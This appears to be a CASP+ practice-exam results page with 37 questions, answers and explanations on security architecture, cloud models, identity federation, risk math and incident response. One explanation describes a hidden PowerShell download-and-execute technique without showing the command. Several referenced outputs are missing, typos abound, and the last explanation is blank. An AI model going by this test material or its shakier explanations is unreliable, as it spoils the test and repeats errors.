(Udemy CASP+ (CAS-004): Practice Exam #1 - Results)

Question 1

A vulnerability scan has returned the following results:

What best describes the meaning of this output?

A. Windows Defender has a known exploit that must be resolved or patched
B. Connecting to the host using a null session allows enumeration of thee share names on the host
C. There is an unknown bug in an Apache server with no Bugtraq ID
D. There is no CVE present, so this is a false positive caused by Apache running on a Windows server

Answer 1

B. Connecting to the host using a null session allows enumeration of thee share names on the host

Explanation:
These results from the vulnerability scan conducted show an enumeration of open Windows shares on an Apache server. The enumeration results show three share names (print$, files, Temp) were found using a null session connection. There is no associated CVE with this vulnerability, but it is not a false positive. Not all vulnerabilities have a CVE associated with them. Nothing in this output indicates anything concerning Windows Defender, so this is not the correct answer. Bugtraq IDs are a different type of identification number issued for vulnerabilities by SecurityFocus. Generally, if there is a CVE, there will also be a Bugtraq ID. Both the CVE and Bugtraq ID being blank is not suspicious since we are dealing with a null enumeration result.

Question 2

Your boss is looking for a recommendation for a cloud solution that will only allow for both onsite systems and cloud services to work together seamlessly. What type of cloud model should you recommend?

A. Public Cloud
B. Community Cloud
C. Hybrid Cloud
D. Private Cloud

Answer 2

C. Hybrid Cloud

Explanation:
A hybrid cloud model allows for the seamless integration of both onsite and cloud services to the end-user simultaneously. Hybrid clouds can be cost-efficient, flexible, easy to migrate to a complete cloud solution in the future, and require less maintenance than completely onsite options. As with all cloud options, the contents must be properly secured due to the elastic storage nature of all cloud solutions and the possibility of data remnants. A public cloud contains services offered by third-party providers over the public Internet and is available to anyone who wants to use or purchase them. They may be free or sold on-demand, allowing customers to pay only per usage for the CPU cycles, storage, or bandwidth they consume. A private cloud contains services offered either over the Internet or a private internal network and only to select users instead of the general public. A community cloud is a collaborative effort in which infrastructure is shared between several organizations from a specific community with common concerns (security, compliance, jurisdiction, etc.), whether managed internally or by a third party and hosted internally or externally.

Question 3

A new alert has been distributed throughout the information security community regarding a critical Apache vulnerability. What action could you take to ONLY identify the known vulnerability?

A. Perform an unauthenticated vulnerability scan on all servers in the environment
B. Perform a web vulnerability scan on all servers in the environment
C. Perform an authenticated scan on all web servers in the environment
D. Perform a scan for the specific vulnerability on all web servers

Answer 3

D. Perform a scan for the specific vulnerability on all web servers

Explanation:
Since you wish to check for only the known vulnerability, you should scan for that specific vulnerability on all web servers. All web servers are chosen because Apache is a web server application. While performing an authenticated scan of all web servers or performing a web vulnerability scan of all servers would also find these vulnerabilities, it is a much larger scope. It would waste time and processing power by conducting these scans instead of properly scoping the scans based on your needs. Performing unauthenticated vulnerability scans on all servers is also too large in scope (all servers) while also being less effective (unauthenticated scan).

Question 4

You have been asked to recommend a capability to monitor all of the traffic entering and leaving the corporate network’s default gateway. Additionally, the company’s CIO requests to block certain content types before it leaves the network based on operational priorities. Which of the following solution should you recommend to meet these requirements?

A. Install a firewall on the routers internal interface and a NIDS on the routers external interface
B. Configure IP filtering on the internal and exteranl interfaces of the router
C. Install a NIPS on the internal interface and a firewall on the external interface of the router
D. Installation of a NIPS on both the internal and exteranl interfaces of the router

Answer 4

C. Install a NIPS on the internal interface and a firewall on the external interface of the router

Explanation:
Due to the requirements provided, you should install a NIPS on the gateway router’s internal interface and a firewall on the external interface of the gateway router. The firewall on the external interface will allow the bulk of the malicious inbound traffic to be filtered before reaching the network. Then, the NIPS can be used to inspect the traffic entering the network and provide protection for the network using signature-based or behavior-based analysis. A NIPS is less powerful than a firewall and could easily “fail open” if it is overcome with traffic by being placed on the external interface. The NIPS installed on the internal interface would also allow various content types to be quickly blocked using custom signatures developed by the security team. We wouldn’t want to place the NIPS on the external interface in the correct choice for the same reasons. We also wouldn’t choose to install a NIPS on both the internal and external connections. IP filtering on both interfaces of the router will not provide the ability to monitor the traffic or to block traffic based on content type. Finally, we would not want to rely on a NIDS on the external interface alone since it can only monitor and not provide the content blocking capabilities needed.

Question 5

Which of the following security policies could help detect fraudulent cases that occur even when other security controls are already in place?

A. Mandatory vacations
B. Separation of duties
C. Least privilege
D. Dual control

Answer 5

A. Mandatory vacations

Explanation:
Mandatory vacation policies require employees to take time away from their job and help to detect fraud or malicious activities. Even if other controls such as separation of duties, least privilege, and dual control are used, an employee could collude with others to conduct fraud. By utilizing mandatory vacation policies, this fraud can often be discovered since a new person will be conducting the duties assigned to the person on vacation. Separation of duties is the concept of having more than one person required to complete a particular task to prevent fraud and error. Dual control, instead, requires both people to act together. For example, a nuclear missile system uses dual control and requires two people to each turn a different key simultaneously to allow for a missile launch to occur. Least privilege is the concept and practice of restricting access rights for users, accounts, and computing processes to only those resources required to perform routine, legitimate activities.

Question 6

What type of cloud service would allow you to provide a cloud-based application to your employees using their smartphones?

A. IaaS
B. SaaS
C. DaaS
D. PaaS

Answer 6

B. SaaS

Explanation:
Software as a service (SaaS) allows users to connect to and use cloud-based apps over the Internet. Common examples are email, calendaring, and office tools. SaaS provides a complete software solution that you purchase on a pay-as-you-go basis from a cloud service provider. You rent the use of an app for your organization, and your users connect to it over the Internet, usually with a web browser. All of the underlying infrastructure, middleware, app software, and app data are located in the service provider’s data center. The service provider manages the hardware and software, and with the appropriate service agreement, it will ensure the availability and the security of the app and your data. SaaS allows your organization to get quickly up and running with an app at minimal upfront cost. Platform as a Service (PaaS) is a cloud computing service that enables consumers to rent fully configured systems that are set up for specific purposes. Infrastructure as a Service (IaaS) is a cloud computing service that enables a consumer to outsource computing equipment purchases and running their own data center. Desktop as a Service (DaaS) provides a full virtualized desktop environment from within a cloud-based service. This is also known as VDI (Virtualized Desktop Infrastructure) and is coming in large enterprise businesses focused on increasing their security and minimizing their operational expenses.

Question 7

Dion Training is using a cloud service provider under an Infrastructure as a Service (IaaS) model. Assuming there is a shared responsibility model between the two organizations, which of the following is MOST likely the security responsibility of the cloud service provider under this IaaS model?

A. User identity management
B. Security of isolation between tenants
CV. Protection of operating systems
D. Use and configuration of encryption

Answer 7

B. Security of isolation between tenants

Explanation:
The shared responsibility model identifies that responsibility for the implementation of security as applications, data, and workloads are transitioned into a cloud platform and shared between the customer and the cloud service provider (CSP). Using an Infrastructure as a Service (IaaS) model provides hardware hosted at a provider facility using the provider’s physical security controls and utilities. Identifying the boundary between customer and cloud provider responsibilities, in terms of security, is imperative for reducing the risk of introducing vulnerabilities into your environment. In this scenario, since an IaaS model was chosen, the cloud service provider will be responsible for the security of cloud infrastructure resource isolation between tenants. Dion Training, on the other hand, will be responsible for user identity management, protection of the operating systems, and the use and configuration of encryption, including the protection of the encryption keys.

Question 8

While conducting a penetration test against an organization, you gained access to the CEO’s account. You log in as the CEO and send the following email:

Which of the following attacks are you utilizing in this scenario?

A. BEC Attack
B. Whaling attack
C. Deauthentication attack
D. Smishing attack

Answer 8

A. BEC Attack

Explanation:
A business email compromise (BEC) is a form of elicitation where the attacker impersonates a high-level executive or directly takes over their email account. The attacker then sends an email to elicit personnel to take action on their behalf. In this example, the attacker is impersonating the company’s CEO by sending an email to the financial personnel requesting they send a money transfer for what appears to be a legitimate service. This example also uses the urgency and authority motivation factors to convince the employee to take action.

Question 9

A technician is testing a new web-based tool capable of generating an automatic teller machine (ATM) cash and service availability reports. A consortium of financial institutions developed the web-based tool. Which of the following cloud delivery models is being described in this scenario?

A. Public
B. Hybrid
C. Private
D. Community

Answer 9

D. Community

Explanation:
A community cloud is a collaborative effort in which infrastructure is shared between several organizations from a specific community with common concerns (security, compliance, jurisdiction, etc.), whether managed internally or by a third party and hosted internally or externally. The scenario described is a community cloud-created tool by the banking industry. A public cloud contains services offered by third-party providers over the public Internet and is available to anyone who wants to use or purchase them. They may be free or sold on-demand, allowing customers to pay only per usage for the CPU cycles, storage, or bandwidth they consume. A private cloud contains services offered either over the Internet or a private internal network and only to select users instead of the general public. A hybrid cloud uses a mix of on-premises, private cloud, and third-party, public cloud services with orchestration between these platforms. This typically involves a connection from an on-premises data center to a public cloud.

Question 10

Which of the following should a domain administrator utilize to BEST protect their endpoints from buffer overflow attacks?

A. Ensure ASLR is enabled on the endpoint
B. Install an anti-malware tool on the endpoint
C. Conduct input validation on all web input forms
D. Conduct bound checking before executing a program

Answer 10

A. Ensure ASLR is enabled on the endpoint

Explanation:
Address Space Layout Randomization (ASLR) is a feature that randomly arranges the address space of the memory so that attacker cannot place their code into predetermined spots. Essentially, ASLR is used as a mechanism to provide buffer overflow prevention by making it difficult to guess the location of executable files stored in the random access memory. ASLR must be supported by the underlying operating system for it to work. Every version of Windows since Windows 7 supports ASLR, as does every version of Macintosh OS X since 2007. At this point, ASLR is considered commonplace in Windows, Macintosh, iOS, Android, and BSD operating systems.

Question 11

An electronics store was recently the victim of a robbery where an employee was injured, and some property was stolen. The store’s IT department hired an external supplier to expand its network to include a physical access control system. The system has video surveillance, intruder alarms, and remotely monitored locks using an appliance-based system. Which of the following long-term cybersecurity risks might occur based on these actions?
A. There are no new risks due to the install and the company has a strong physical security posute
B. These devices should be isolated from the rest of the enterprise network
C. These devices are insecure and should be isolated from the internet
D. These devices should be scanned for viruses before installation

Answer 11

B. These devices should be isolated from the rest of the enterprise network

Explanation:
While the physical security posture of the company has been improved by adding the cameras, alarms, and locks, this appliance-based system may pose additional risks to the store’s network. Specialized technology and appliance-based systems rarely receive security updates at the same rate as regular servers or endpoints. These devices need to be on a network to ensure that their network functions can continue, but they don’t necessarily need to be on the enterprise production network. A good option would be to set up a parallel network that is physically or logically isolated from the enterprise network and install the video cameras, alarms, and lock on that one. These devices cannot be isolated from the internet without compromising their functions, such as allowing remote monitoring of the system and locks. The devices should be scanned for viruses before installation, but that is a short-term consideration and doesn’t protect them long-term.

Question 12

You are conducting a routine vulnerability scan of a server when you find a vulnerability. You locate a patch for the vulnerability on the software vendor’s website. What should you do next?

A. Establish continuous monitoring
B. Submit a request for change using the change management process
C. Download and install the patch immediately
D. Start the incident response process

Answer 12

B. Submit a request for change using the change management process

Explanation:
OBJ-2.3: Before any change to a baseline occurs, a Request for Change should be submitted. This submission will start the change management process within your organization. Once approved, the patch should be tested in a staging environment, installed on the production server, and then the server should be rescanned to ensure the vulnerability no longer exists. In this scenario, no incident response is being performed since this vulnerability is found during a routine vulnerability scan.

Question 13

Which of the following identity and access management controls relies upon using a certificate-based authentication mechanism?

A. Smart card
B. HOTP
C. Proximity Card
D. TOTP

Answer 13

A. Smart card

Explanation:
Smart cards, PIV, and CAC devices are used as an identity and access management control. These devices contain a digital certy embedded within the smart card. (PIV/CAC) presented to the system when it is inserted into the smart card reader. When combined with a PIN, the smart card can be used as a multi-factor authentication mechanism. The PIN unlocks the card and allows the digital certificate to be presented to the system.

Question 14

Which of the following authentication methods is an open-source solution for single sign-on across organizational boundaries on the web?

A. TACAS+
B. Kerberos
C. RADIUS
D. Shibboleth

Answer 14

D. Shibboleth

Explanation:
OBJ-1.5: Shibboleth is a standards-based, open-source software package for single sign-on across or within organizational boundaries on the web. It allows sites to make informed authorization decisions for individual access to protected online resources in a privacy-preserving manner. Shibboleth utilizes SAML to provide this federated single sign-on and attribute exchange framework.

Question 15

Dion Training is setting up a new website called YourCyberPath.com. Dion Training wants to install the same digital certificate on YourCyberPath.com and DionTraining.com. Which of the following digital certificate types should they utilize to meet this requirement?

A. Wildcard
B. General purpose
C. Extended validation
D. Multidomain

Answer 15

D. Multidomain

Explanation:
OBJ-3.5: A multidomain certificate is a single SSL/TLS digital certificate that can be used to secure multiple, different domain names. For example, if you want to install the same certificate on diontraining.com and yourcyberpath.com, you will need to register a multidomain certificate. A wildcard certificate contains the wildcard character (*) in its domain name field and allows the digital certificate to be used for any number of subdomains. For example, the wildcard certificate of *.diontraining.com can be used for members.diontraining.com, cart.diontraining.com, and support.diontraining.com. General Purpose or Domain Validation (DV) digital certificates prove the ownership of a particular domain by responding to an email to the authorized domain contact or by publishing a text record to the domain’s DNS records. Extended Validation (EV) digital certificates are subject to a process that requires more rigorous checks on the subject’s legal identity and control over the domain or software being signed. A major drawback to EV certificates is that they cannot be issued for a wildcard domain.

Question 16

Dion Consulting Group is helping an organization build a new Security Operations Center. The organization wants to create a centralized repository that contains logs from all the network devices, servers, and endpoints so cybersecurity analysts can search the repository and conduct threat hunting. Which of the following types of sensors or systems should you implement to centralize the logging and event data from across the enterprise network into one place?

A. Host based intrusion detection (HIDS)
B. File integrity monitoring (FIM)
C. Security and information event management (SIEM)
D. Data Loss Prevention (DLP)

Answer 16

C. Security and information event management (SIEM)

Explanation:
OBJ-1.1: While all of these options can provide logging information, only a SIEM works to consolidate various sources of logs and event information into a single repository. Security information and event management system (SIEM) is a solution that provides real-time or near-real-time analysis of security alerts generated by network hardware and applications. File integrity monitoring (FIM) is a type of software that reviews system files to ensure that they have not been tampered with. Host-based intrusion detection systems (HIDS) provide threat detection by monitoring an operating system’s logs, processes, services, files, systems, and the Windows Registry where applicable. Data Loss Prevention (DLP) is a software solution designed to detect and prevent sensitive information from being used, transmitted, or stored inappropriately.

Question 17

A penetration tester issued the following command on a victimized Windows system:
Based on this command, which of the following exploits is the penetration tester MOST likely trying to conduct?

A. Download and execute a remote script
B. Exploiting unquoted service paths
C. Scheduling a task for persistencee
D. Conduct DLL hijacking

Answer 17

A. Download and execute a remote script

Explanation:
This command executes the PowerShell environment without loading the PowerShell profile (-nop) and in a hidden window (-w hidden). The command powershell.exe is running is shown after the -c, which stands for executing a command or script block and then exiting. This command in PowerShell to Invoke-Expression (IEX) creates a new web client object and then downloads the file located at the URL provided. This file could be malicious, and if it is another PowerShell script, it will be executed once downloaded.

Question 18

Which party in a federation provides services to members of the federation?

A. SSO
B. RP
C. SAML
D. IdP

Answer 18

B. RP

Explanation:
Relying parties (RPs) provide services to members of a federation. An identity provider (IdP) provides identities, makes assertions about those identities, and releases information about the identity holders. The Security Assertion Markup Language (SAML) is an open standard for exchanging authentication and authorization data between parties between an identity provider and a service provider (SP) or a relying party (RP). Single sign-on (SSO) is an authentication scheme that allows a user to log in with a single ID and password to any of several related yet independent software systems across a federation. SAML and SSO are not parties. Therefore, they cannot possibly be the right answer to this question.

Question 19

Which of the following cipher suites does not support the more secure ephemeral key agreement mode?

A. TLS_RSA_WITH_AES_256_CBC_SHA256
B. TLS_AES_256_GCM_SHA384
C. TLS_CHACHA20_POLY1305_SHA256
D. ECDHE_RSA_AES128_GCM_SHA256

Answer 19

A. TLS_RSA_WITH_AES_256_CBC_SHA256

Explanation:
The reason is that the TLS_RSA_WITH_AES_256_CBC_SHA256 cipher suite uses the RSA key exchange method, which is not ephemeral. In RSA key exchange, the server’s public key is used to encrypt the pre-master secret, and this pre-master secret is then used to generate the session keys. The problem with this method is that if the server’s private key is compromised, all past sessions that used this key exchange method could be decrypted.

On the other hand, the other cipher suites listed support more secure ephemeral key agreement modes:

ECDHE_RSA_AES128_GCM_SHA256: This uses the Elliptic Curve Diffie-Hellman Ephemeral (ECDHE) key exchange, providing forward secrecy. This means that even if the server’s private key is compromised in the future, previously recorded sessions cannot be decrypted.

TLS_AES_256_GCM_SHA384: This cipher suite uses AES-256 in Galois/Counter Mode (GCM) for encryption and SHA-384 for message authentication. It does not specify the key exchange method explicitly but should be used with ephemeral key exchange for better security.

TLS_CHACHA20_POLY1305_SHA256: This cipher suite uses the ChaCha20-Poly1305 encryption algorithm along with SHA-256 for message authentication. Like TLS_AES_256_GCM_SHA384, it doesn’t specify the key exchange method explicitly but should be used with an ephemeral key exchange for better security.

In summary, TLS_RSA_WITH_AES_256_CBC_SHA256 is the only option that does not support the more secure ephemeral key agreement mode.

IMG_8175

Question 20

Keith wants to validate the application file that he downloaded from the vendor of the application. Which of the following should he compare against the file to verify the integrity of the downloaded application?

A. Private key of the file
B. Public key of the file
C. File size and file creation date
D. MD5 or SHA1 hash digest of the file

Answer 20

D. MD5 or SHA1 hash digest of the file

Explanation:
Keith should conduct a hash of the downloaded file and compare it against the MD5 hash digest listed on the server of this file. This file needs to be a verifiable MD5 hash file to validate the file integrity has not been compromised during the download. This is an important step to ensure the file was not modified in transit during the download. The other options are insufficient to guarantee the integrity of the downloaded file since integrity checking relies on comparing hash digests. A public or private key would not be assigned solely to a single file, nor do they provide integrity on their own. Public and private keys are used to ensure data confidentiality, whereas a hash digest ensures integrity. The file size and file creation date are additional forms of metadata that could help validate a file’s integrity. Still, they are of a much lower quality and trust factor than using a hash digest. Therefore MD5 or SHA1 is a better choice.

Question 21

Dion Training provides its team members with a mobile device so that they can respond to questions when they are out of the office. To minimize the risk of a data leak, the organization has decided to purchase each employee a new iPhone, configure it using a mobile device management (MDM) solution, and use a containerized app to process and store all corporate data on the device. Each employee signs an AUP that states they can use the device for work-related and personal use, but the device and any data stored on it remain the property of Dion Training. Which of the following policies BEST describes Dion Training’s mobile device deployment model?

A. COBO
B. CYOD
C. COPE
D. BYOD

Answer 21

C. COPE

Explanation:
Corporate Owned Personally Enabled (COPE) is a mobile device deployment model where the device remains the property of the organization, but certain personal use, such as private email, social networking, and web browsing, is also permitted. Corporate Owned Business Only (COBO) is a mobile device deployment model that provides the employee with a corporate-owned device that may only be used for official work functions and purposes. Choose Your Own Device (CYOD) is a mobile device deployment model where employees are offered a selection of corporate devices for work and, optionally, private use. Bring Your Own Device (BYOD) is a mobile device deployment model that facilitates the use of personally owned devices to access corporate networks and data.

Question 22

Ryan needs to verify the installation of a critical Windows patch on his organization’s workstations. Which method would be the most efficient to validate the current patch status for all of the organization’s Windows 10 workstations?

A. Create and run a PowerShell script to search for the specific patch in question
B. Use an endpoint manager to validate patch status for each machine on the domain
C. Conduct a registry scan of each workstationn to validate the patch was installed
D. Check the Update History manually

Answer 22

B. Use an endpoint manager to validate patch status for each machine on the domain

Explanation:
OBJ-3.2: The Microsoft Endpoint Configuration Manager (MECM) provides remote control, patch management, software distribution, operating system deployment, network access protection, and hardware and software inventory. In an Azure environment, you can also use the Update Compliance tool to monitor your device’s Windows updates, Windows Defender anti-virus status, and the up-to-date patching status across all of your Windows 10 workstations. In previous Windows versions, you could use the Microsoft Baseline Analyzer (MSBA), but that is no longer supported when Windows 10 was introduced. A PowerShell script may be a reasonable option, but it would take a knowledgeable analyst to create the script and scan the network, whereas using SCCM is easier and quicker. Manually checking the Update History or registry of each system could also work, but that is very time-consuming and inefficient, especially if Ryan is supporting a large network.

Question 23

Fail to Pass Systems has recently moved its corporate offices from France to Westeros, a country with no meaningful privacy regulations. The marketing department believes that this move will allow the company to resell all of its customer’s data to third-party companies and shield the company from any legal responsibility. Which policy is violated by this scenario?

A. Data sovereignty
B. Data enrichment
C. Data limitation
D. Data minimization

Answer 23

A. Data sovereignty

Explanation:
While the fictitious Westeros may have no privacy laws or regulations, the laws of the countries where the company’s customers reside may still retain sovereignty over the data obtained from those regions during the company’s business there. This is called Data Sovereignty. Data sovereignty refers to a jurisdiction (such as France or the European Union) preventing or restricting processing and storage from taking place on systems that do not physically reside within that jurisdiction. Data sovereignty may demand certain concessions on your part, such as using location-specific storage facilities in a cloud service. Fail to Pass Systems will likely face steep fines from different regions if they go through with their plan to sell all of their customers’ data to the highest bidders. Fail to Pass Systems may even be blocked from communicating with individual regions. Although Data minimization and data limitation policies may be violated depending on the company’s internal policies, these policies are not legally binding like the provisions of GDPR are. Data enrichment means that the machine analytics behind the view of a particular alert can deliver more correlating and contextual information with a higher degree of confidence, both from within the local network’s data points and from external threat intelligence.

Question 24

Dion Training Solutions is currently calculating the risk associated with building a new data center in a hurricane-prone location. The data center would cost $3,125,000 to build and equip. Based on their assessment of the history of the location, a major hurricane occurs every 20 years and their data center would risk losing 60% of its value due to downtime and possible structural damages. If the data center is built in this location, what is the annual rate of occurrence for this data center?

A. 0.03
B. 0.60
C. 0.05
D. 0.20

Answer 24

C. 0.05

Explanation:
OBJ-4.1: The annual rate of occurrence is 0.05 since one incident occurs every 20 years (1/20 is 0.05). The annual rate of occurrence (ARO) is the number of times in a year that a single event occurs. If the number of times an event occurs is counted over multiple years, then the number is divided by the number of years to calculate the ARO. If the number of times is counted monthly, then it is multiplied by 12 to annualize it. For example, if the number of occurrences was 3 times per month, then the ARO would be 36 times per year (3 occurrences x 12 months in a year).

Question 25

A company-wide audit revealed employees are using company laptops and desktops for personal use. To prevent this from occurring, in which document should the company incorporate the phrase “Company-owned IT assets are to be used to perform authorized company business only”?

A. AUP
B. MOU
C. SLA
D. NOA

Answer 25

A. AUP

Explanation:
OBJ-4.1: Acceptable Use Policy dictates what types of actions an employee can or cannot do with company-issued IT equipment. An acceptable use policy (AUP) is a set of rules applied by the owner, creator, or administrator of a network, website, or service, that restrict how the network, website, or system may be used and sets guidelines as to how it should be used. A memorandum of understanding (MOU) is important because it defines the responsibilities of each party in an agreement, provides the scope and authority of the agreement, clarifies terms, and outlines compliance issues. A non-disclosure agreement (NDA) is a legal contract or part of a contract between at least two parties that outlines confidential material, knowledge, or information that the parties wish to share for certain purposes, but wish to restrict access to. A service level agreement (SLA) is a commitment between a service provider and a client for particular aspects of the service, such as quality, availability, or responsibilities.

Question 26

An organization wants to improve its ability to detect the infiltration of servers in a DMZ or screened subnet. The network’s IPS/IDS solutions are currently located on edge between DMZ and Untrust, and DMZ and Trust. Which of the following could increase visibility inside the DMZ or screened subnet?

A. Honeypot
B. NAC server
C. VPN headend
D. Layer 7 firewall

Answer 26

D. Layer 7 firewall

Explanation:
OBJ-1.1: Layer 7 firewalls operate at the application layer. These devices allow you to implement security at a more granular level. A layer 7 firewall can be configured to log all of the details for data entering and leaving the DMZ or screened subnet. A network access control (NAC) server is used to unify your endpoint security technology and user/system authentication. A NAC server is used for authentication, and would not provide additional visibility into the DMZ or screened subnet. A honeypot is a computer security mechanism set to detect, deflect, or, in some manner, counteract attempts at unauthorized use of information systems. A honeypot will detect attacks against itself, but not the other servers in the DMZ or screened subnet. A VPN headend establishes multiple encrypted VPN tunnels at the same time and provides a secure and encrypted connection between different VPN nodes. A VPN headend would not provide any additional visibility into the DMZ or screened subnet.

Question 27

Which of the following does a User-Agent request a resource from when conducting a SAML transaction?

A. Identity provider
B. Single sign on
C. Relying party
D. Service provider

Answer 27

D. Service provider

Explanation:
OBJ-1.5: Security assertions markup language (SAML) is an XML-based framework for exchanging security-related information such as user authentication, entitlement, and attributes. SAML is often used in conjunction with SOAP. SAML is a solution for providing single sign-on (SSO) and federated identity management. It allows a service provider (SP) to establish a trust relationship with an identity provider (IdP) so that the SP can trust the identity of a user (the principal) without the user having to authenticate directly with the SP. The principal’s User Agent (typically a browser) requests a resource from the service provider (SP). The resource host can also be referred to as the relying party (RP). If the user agent does not already have a valid session, the SP redirects the user agent to the identity provider (IdP). The IdP requests the principal’s credentials if not already signed in and, if correct, provides a SAML response containing one or more assertions. The SP verifies the signature(s) and (if accepted) establishes a session and provides access to the resource.

Question 28

During your review of the firewall logs, you notice that an IP address from within your company’s server subnet had been transmitting between 125 to 375 megabytes of data to a foreign IP address overnight each day. You have determined this has been occurring for approximately 5 days, and the affected server has since been taken offline for forensic review. Which of the following is MOST likely to increase the impact assessment of the incident?

A. Forensic review of the server required fallback to a less efficient service
B. IP Addresses and other network related configurations were exfiltrated
C. PII of company employees and customers was exfiltrated
D. Raw financial information about the company was accessed

Answer 28

C. PII of company employees and customers was exfiltrated

Explanation:
OBJ-2.7: If the PII (Personally Identifiable Information) of the company’s employees or customers were exfiltrated or stolen during the compromise, this would increase the incident’s impact assessment. Loss of PII is a big issue for corporations and one that might garner media attention. While all of the options presented here are bad things that could increase the impact of the assessment, loss of PII is considered the MOST likely to increase the impact dramatically. Depending on the company’s size or organization, there may also be mandatory reporting requirements, fines, or restitution that must be paid.

Question 29

Your company is adopting a new BYOD policy for tablets and smartphones. Which of the following would allow the company to secure the sensitive information on personally owned devices and the ability to remote wipe corporate information without the user’s affecting personal data?

A. Touch ID
B. Face ID
C. Long and complex passwords
D. Contanerization

Answer 29

D. Contanerization

Explanation:
OBJ-3.1: Containerization is the logical isolation of enterprise data from personal data while co-existing in the same device. The major benefit of containerization is that administrators can only control work profiles that are kept separate from the user’s personal accounts, apps, and data. This technology creates a secure vault for your corporate information. Highly targeted remote wiping is supported with most container-based solutions.

Question 30

You are in the recovery steps of an incident response. Throughout the incident, your team never successfully determined the root cause of the network compromise. Which of the following options would you LEAST likely perform as part of your recovery and remediation actions?

A. Restrict host access to peripheral protocols like USB or Bluetooth
B. Disable unused user accounts
C. Review and enhance patch management policies
D. Proactively sanitizie and reimage all of your routers and switchers

Answer 30

D. Proactively sanitizie and reimage all of your routers and switchers

Explanation:
OBJ-3.2: Since your team could not determine the root cause of the compromise, you would most likely conduct system and network hardening actions as part of the recovery and remediation. The only option that is not considered a hardening action is proactively sanitizing and reimaging your routers and switches. If you performed this action, you could have unwanted disruptive effects on the company. Instead, it would be more beneficial to increase monitoring of the devices to ensure they are not compromised. Proactively sanitizing and reimaging all of the routers and switches would be a large undertaking. Without evidence suggesting that such an approach is warranted, you would be wasting a lot of time and money. The other options presented are the best security practices to prevent future compromises. Reimaging the network devices without knowing the root cause will likely be ineffective in securing the network.

Question 31

An ethical hacker has been hired to conduct a physical penetration test of a company. During the first day of the test, the ethical hacker dresses up like a plumber and waits in the building’s main lobby until an employee goes through the main turnstile. As soon as the employee enters his access number and proceeds to go through the turnstile, the ethical hacker follows them through the access gate. What type of attack did the ethical hacker utilize to access the restricted area of the building?

A. Tailgating
B. Shoulder surfing
C. Social engineering
D. Spoofing

Answer 31

A. Tailgating

Explanation:
OBJ-2.6: Based on the description, the ethical hacker conducted a very specialized type of social engineering attack known as tailgating. Sometimes on a certification exam, there are two correct answers, but one is more correct. This question is an example of that concept. Tailgating involves someone who lacks the proper authentication following an employee into a restricted area. Social engineering uses deception to manipulate individuals into divulging confidential or personal information that may be used for fraudulent purposes. Shoulder surfing is a type of social engineering technique used to obtain personal identification numbers (PINs), passwords, and other confidential data by looking over the victim’s shoulder. Spoofing is the act of disguising a communication from an unknown source as being from a known, trusted source.

Question 32

What tool is used to collect wireless packet data?

A. Nessus
B. John the Ripper
C. Netcat
D. Aircrack-ng

Answer 32

D. Aircrack-ng

Explanation:
OBJ-2.9: Aircrack-ng is a complete suite of wireless security assessment and exploitation tools that includes monitoring, attacking, testing, and cracking of wireless networks. This includes packet capture and export of the data collected as a text file or pcap file. John the Ripper is a password cracking software tool. Nessus is a vulnerability scanner. Netcat is used to create a reverse shell from a victimized machine back to an attacker.

Question 33

Jonathan is trying to open an encrypted and digitally-signed email he sent 3 years ago. Last month, he was issued a new public/private key pair since his old key pair had expired. When attempting to open some encrypted and digitally-signed emails he sent last week, he can read them without any issues. Which of the following errors is causing Jonathan’s issues with reading the email from 3 years ago?

A. Mismtached key error
B. Incorrect name error
C. Rekeying error
D. Compromised key pair

Answer 33

A. Mismtached key error

Explanation:
OBJ-3.7: The reason Jonathan can no longer read those encrypted emails is that his previous public/private key pair has expired and is no longer valid for use. His email client is trying to decrypt those emails using his new public/private key pair causing a mismatched key error. A mismatched key error occurs is the wrong public/private key pair is used to decrypt data. The most common forms of this error are displayed as “key mismatch” or “X509_check_private_key”. Rekeying is the process of changing an individual key during a communication session. Most communication protocols use session key rekeying to protect the data being transmitted. A rekeying is normally triggered based on the volume of data communicated or the amount of time since the last rekeying. A compromised or exposed key occurs when unauthorized access to a symmetric or private key is gained. When a key is compromised or exposed, it must be revoked and replaced. An incorrect name error is generated when the certificate’s CN name does not match the FQDN of the system that is using the certificate. For example, if the certificate is issued to diontraining.com but is being presented for www.diontraining.com or yourcyberpath.com, it will generate an incorrect name error.

Question 34

You are configuring the ACL for the network perimeter firewall. You have just finished adding all the proper allow and deny rules. What should you place at the end of your ACL rules?

A. An implicit deny statement
B. A time of day restriction
C. An implicit allow statement
D. A SNMP deny string

Answer 34

A. An implicit deny statement

Explanation:
According to the best practices of firewall configurations, you should include an implicit deny at the end of your ACL rules. This will ensure that anything not specifically allowed in the rules above is blocked. Using an implicit allow is a bad security practice since it will allow anything into the network that is not specifically denied. While the time of day restrictions can be useful, they are not required for all network implementations.

Question 35

Dion Training currently estimating the next fiscal year’s cybersecurity incident response budget. Jason has calculated an asset value of $75,000 for the server clusters that run the company’s practice exams for students. Based on his analysis, he believes that a one-hour denial of service attack on this server will occur twice every three years and has a risk exposure factor is 90% during the attack. What is the single loss expectancy (SLE) when a DDoS attack occurs against the practice exam server cluster?

A. $67,500
B. $75,000
C. $50,000
D. $45,000

Answer 35

A. $67,500

Epxplanation:
The single loss expectancy (SLE) is the amount that would be lost in a single occurrence of a particular risk factor. To calculate the single loss expectancy (SLE), you will multiple the asset value (AV) times the exposure factor (EF). Since you are asked to calculate the single loss expectancy, you do not need to calculate the annual rate of occurrence (2/3 or 66%) nor the annualized loss expectancy ($45,000). SLE = AV x EF = $75,000 x 0.90 = $67,500

Question 36

Following an incident, the incident response team has generated many recommendations for additional controls and items to be purchased to prevent future recurrences. Which of the following approaches best describes what the organization should do next?

A. Contract an outsidee security consultasnt to provide an independent assessment of the network and outsource the remediation efforts
B. Conduct a cost/beneefit analysis of each recommendation against the companys current fiscal posture
C. Submit a prioritized list with all of the recommendations for review, procurement and installation
D. Immediately procure and install all of them because the adversary may reattack at any time

Answer 36

C. Submit a prioritized list with all of the recommendations for review, procurement and installation

Explanation:
Since an incident has just occurred, it is important to act swiftly to prevent a reoccurrence. The organization should still take a defined and deliberate approach to choosing the proper controls and risk mitigations. Therefore, execution through a rational business management process is the best approach, including creating a prioritized list of recommendations. Once this list has been created, the organization can conduct a cost/benefit analysis of each recommendation and determine which controls and items will be implemented in the network based upon resource availability in terms of time, person-hours, and money. This process does not need to be a long-term study or filled with complexity. Instead, it should be rapidly conducted due to the probability that an attacker may compromise the network again.

Question 37

A recently hired security employee at a bank was asked to perform daily scans of the bank’s intranet to look for unauthorized devices. The new employee decides to create a script that scans the network for unauthorized devices every morning at 2:00 am. Which programming language would work best to create this script?

A. PHP
B. Python
C. C#
D. ASP.NET

Answer 37

B. Python

Explanation:
